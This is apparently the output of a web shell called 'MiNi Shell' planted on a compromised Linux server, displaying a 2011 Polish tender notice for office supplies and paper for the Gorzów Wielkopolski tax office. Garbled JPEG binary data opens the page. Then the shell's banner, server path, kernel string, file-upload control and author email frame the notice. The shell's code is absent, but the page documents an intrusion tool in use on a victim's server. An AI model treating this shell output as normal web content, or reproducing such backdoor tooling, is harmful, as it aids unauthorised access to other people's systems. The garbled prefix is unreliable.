JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110215/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20110215/22424-N-2011.html

<p class="kh_header"><b>Gorzów Wielkopolski: Dostawa nowych materiałów biurowych ( wg CPV - 30192000-1 Wyroby biurowe) oraz papieru kserograficznego ( wg CPV - 30197644-2 Papier kserograficzny) i komputerowego ( wg CPV - 30199330-2 Papier ciągły do drukarek komputerowych)
dla Urzędu Skarbowego w Gorzowie Wlkp.</b><br>
<b>Numer ogłoszenia: 22424 - 2011; data zamieszczenia: 15.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Skarbowy , ul. Jagiellończyka 10, 66-400 Gorzów Wielkopolski, woj. lubuskie, tel. 095 7115742, faks 095 7228997.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.usgorzow.mf.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa nowych materiałów biurowych ( wg CPV - 30192000-1 Wyroby biurowe) oraz papieru kserograficznego ( wg CPV - 30197644-2 Papier kserograficzny) i komputerowego ( wg CPV - 30199330-2 Papier ciągły do drukarek komputerowych)
dla Urzędu Skarbowego w Gorzowie Wlkp..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	część A - nowych materiałów biurowych ( wg CPV - 30192000-1 Wyroby biurowe), tj.:


Lp.	Nazwa towaru	                         Ilość
1.	Blok z makulatury A4/ 50 kartek	- 100
2.	Blok z makulatury A5/ 50 kartek	- 100
3.	Cienkopis (czarny/ czerwony/ zielony/ niebieski) grubość linii 0,3 - 0,4 mm	- 150
4.	Długopis na pulpit - możliwość mocowania w pozycji pionowej i poziomej, dł. sprężynki po rozciągnięciu 1,0-1,5m 	- 80
5.	Długopis automatyczny typu ZENITH lub równoważny o średnicy do 10mm z metalową końcówką	- 210
6.	Wkłady do długopisu automatycznego typu ZENITH lub równoważnego wymienionego w poz. 5	- 500
7.	Długopis zwykły (niebieski/ czarny/ zielony/ czerwony) z wymiennym wkładem i metalową końcówką - gr. linii 0,5 - 0,7 mm	- 120
8.	Dziurkacz mały, ma dziurkować minimalnie 1 kartkę 80 g, a maksymalnie 20 kartek 80 g 	- 17
9.	Dziurkacz żeliwny, ma dziurkować minimalnie 1 kartkę 80 g, a maksymalnie 40 kartek 80 g   	- 5
10.	Gumka do ścierania ołówka, nie naruszająca struktury papieru 	- 50
11.	Klej w płynie zawierający końcówkę z gąbką, nie marszczący papieru. Pojemność nie mniej niż 40 ml	- 200
12.	Koperta z fałdą - rozszerzana C4, RBD szara, samoklejąca, grubość około 40 mm     	- 10
13.	Koperta rozszerzana - B4 brązowa; samoklejąca, o wymiarach 250 x 354 x 40mm	- 1300
14.	Koperta C6 z okienkiem w prawym dolnym rogu, biała, samoklejąca (opak. 1000 szt.)	- 100
15.	Koperta C6 zwykła, biała, samoklejąca  o wymiarach 114 x 229 mm (opak. 1000 szt.)	- 50
16.	Koperta z okienkiem w prawym dolnym rogu - DL, biała, samoklejąca o wymiarach 110 x 220 mm	- 32000
17.	Koperta szara, samoklejąca, duża B4	- 3700
18.	Koperta biała,  samoklejąca, średnia C4 o wymiarach  229 x 324 mm	- 10
19	Koperta szara, samoklejąca średnia C5 o wymiarach 162 x 229 mm	- 2000
20.	Koperta biała,  samoklejąca  B5	- 10
21.	Korektor w płynie (w długopisie - metalowa końcówka) szybkoschnący, pojemność nie mniej niż 8 ml	- 100
22.	Korektor w płynie (z pędzelkiem) szybkoschnący, pojemność nie mniej niż 20 ml	- 50
23.	Kostka papierowa na biurko 83 x 83 x500 arkuszy koloru białego 	- 150
24.	Kostka papierowa samoprzylepna 75 x 75 (100 arkuszy) 	- 300
25.	Koszulka L-ka winna być twarda, formatu A4, bez możliwości wpięcia do segregatora.	- 500
26.	Linijka  z tworzywa sztucznego - długość 15 cm 	- 2
27.	Linijka  z tworzywa sztucznego - długość 30 cm	- 2
28.	Naklejka na segregator samoprzylepna o szerokości 60-70 mm	- 1000
29.	Naklejka na segregator samoprzylepna o szerokości 40-50 mm	- 1000
30.	Nożyczki biurowe od 15 cm - 17 cm, z ostrzem z nierdzewnej stali. Ergonomiczna rączka z odpornego na pęknięcia tworzywa sztucznego.	- 30
31.Obwoluta - koszulka o fakturze groszkowej (opak. 100 szt.) koszulka na dokumenty formatu A4, otwierana z góry wyposażona w grzbiet umożliwiający wpięcie do segregatora.	- 300
32.	Ołówek biurowy drewniany HB	- 60
33.	Okładka do dyplomu format A4	- 3
34.	Pisak (czarny /niebieski /zielony/ czerwony)	- 200
35.	Pisak wodoodporny	- 70
36.	Rozszywasz pozwalający na łatwe usuwanie zszywek z dokumentów. Wykonany z metalu z plastikowymi uchwytami.	- 3
37.	Segregator szeroki A4. Szerokość grzbietu 70 mm posiadający mechanizm dźwigniowy z dociskaczem	- 1600
38.	Segregator wąski A4. Szerokość grzbietu 50 mm posiadający mechanizm dźwigniowy z dociskaczem	- 100
39.	Skoroszyt plastikowy, format A4, wykonany z PCV. Przednia okładka przeźroczysta. Zaopatrzony w wymienny pasek papieru do opisu.	- 140
40.	Skoroszyt zwykły tekturowy	- 100
41.	Skoroszyt plastikowy przeźroczysty z europerforacją do wpięcia do segregatora, format A4 wykonany z PCV. Zaopatrzony w wymienny pasek papieru do opisu.  	- 100
42.	Skoroszyt tekturowy z oczkami umożliwiającymi wpięcie do segregatora.	- 2700
43.	Skoroszyt tekturowy zawieszany wykonany z tektury bielonej, nie lakierowanej format A4 pełny Posiada zawieszkę umożliwiającą wpięcie do segregatora. 	- 1000
44.	Spinacz duży zwykły 50 mm (opak. 100 szt.) wykonany z drutu sprężynującego niklowanego.	- 70
45.	Spinacz mały 28 mm (opak. 100 szt.) wykonany z drutu sprężynującego niklowanego.	- 100
46.	Taśma do maszyn liczących (57 mm 25 mb) biała	- 40
47.	Taśma klejąca samoprzylepna (przeźroczysta szerokość 18 mm długość 20m).	- 100
48.	Taśma pakowa, szara z klejem akrylowym o szerokości 48 mm i dł. nie mniejszej niż 50 m.	- 2
49.	Teczka do podpisu (15 - 17 przegródek)	- 40
50.	Teczka A4 plastikowa -wiązana, przednia okładka przeźroczysta.	- 200
51.	Teczka A4 wiązana - kolor biały. Posiada trzy zakładki chroniące dokumenty przed wypadaniem. 	- 16700
52.	Temperówka wykonana z plastiku, posiada stalowe ostrze mocowane wkrętem.	- 50
53.	Tusz do stempli w plastikowej butelce (czarny), uniwersalny, do każdego rodzaju stempli. Pojemność nie mniej niż 25 ml.	- 30
54.	Tusz do stempli w plastikowej butelce (czerwony) uniwersalny, do każdego rodzaju stempli. Pojemność nie mniej niż 25 ml.	- 100
55.	Zakreślasz fluorescencyjny do zakreśleń na każdego rodzaju papierze. Uniwersalny tusz na bazie wody o naturalnym zapachu. Nie rozmazuje wydrukowanego tekstu, szer. linii 2,0 i 5,0 mm.	- 500
56.	Zeszyt format A5 (100 kart.) białe kartki w kratkę.	- 50
57.	Zeszyt format  A5 (60 kart.) białe kartki w kratkę.	- 50
58.	Zeszyt akademicki format A4, (96 kart.) twarda oprawa.	- 80
59.	Zeszyt akademicki format A4, (96 kart.) miękka oprawa.	- 10
60.	Zszywacz zwykły biurowy na zszywki o wymiarze 24/6. Wykonany z metalu.	- 40
61.	Zszywki stalowe cynkowe 24/6 (opak. 1000 szt.)	- 20
62.	Plastelina (opak. 10 szt.)	- 15
63.	Gumki recepturki - białe duże (opak. 1 kg) średnica 60 mm, długość 10 cm	- 10
64.
	Tasiemka archiwizacyjna 50 mb - (tasiemka podobna do taśm zamontowanych w teczkach wiązanych)	- 300
65.	Rysiki do ołówka automatycznego typu Pentel (fiolka min. 10 rysików)	- 20
66. 	Fastykuły bez tasiemek	- 4000
67.	Wąsy do akt	- 500
68.	Akta osobowe z 5-ma przekładkami	- 100
69. 	Zszywki 23/10 (opakowanie 1000 szt.)	- 4
70.	Zszywacz do zszywania 100 kart	- 1
71.	Pineski (paczka 50 szt.)	- 5

2.	część B - papieru kserograficznego ( wg CPV - 30197644-2 Papier kserograficzny) i komputerowego (wg CPV - 30199330-2 Papier ciągły do drukarek komputerowych), tj.:


Lp.	Nazwa towaru	                                      Ilość
1	Papier komputerowy 250/1 biały, 2000 składek	- 15
2	Papier komputerowy 250/2 biały, 900 składek	- 8
3	Papier komputerowy 390/1 biały, 2000 składek	- 55
4	Papier kserograficzny A4 80g/m2 biały (opakowanie 500 arkuszy)	- 3600
5	Papier kserograficzny A3 80g/m2 biały (opakowanie 500 arkuszy)	- 75

Szczegółowy opis przedmiotu zamówienia zawiera rozdział II  Specyfikacji Istotnych Warunków Zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.76.44-2, 30.19.93.30-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oceny spełnienia warunków udziału w postępowaniu o udzielenie zamówienia Zamawiający dokona na podstawie złożonych przez Wykonawcę oświadczeń oraz dokumentów. Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oceny spełnienia warunków udziału w postępowaniu o udzielenie zamówienia Zamawiający dokona na podstawie złożonych przez Wykonawcę oświadczeń oraz dokumentów. Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oceny spełnienia warunków udziału w postępowaniu o udzielenie zamówienia Zamawiający dokona na podstawie złożonych przez Wykonawcę oświadczeń oraz dokumentów. Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oceny spełnienia warunków udziału w postępowaniu o udzielenie zamówienia Zamawiający dokona na podstawie złożonych przez Wykonawcę oświadczeń oraz dokumentów. Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oceny spełnienia warunków udziału w postępowaniu o udzielenie zamówienia Zamawiający dokona na podstawie złożonych przez Wykonawcę oświadczeń oraz dokumentów. Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca winien również złożyć następujące dokumenty:
a)	wypełniony i podpisany formularz oferty (rozdział III SIWZ) wraz z załącznikami,
b)	pełnomocnictwo do reprezentowania Wykonawcy, jeżeli nie wynika ono z innych złożonych dokumentów, spełniające wymogi określone w Rozdziale I SIWZ Instrukcja dla Wykonawców w pkcie IV ppkt 5, 6.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.usgorzow.mf.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Skarbowy
ul. Jagiellończyka10
66-400 Gorzów Wlkp. 
pok. 240 - I piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.02.2011 godzina 10:15, miejsce: Urząd Skarbowy
ul. Jagiellończyka10
66-400 Gorzów Wlkp. 
pok. 240 - I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com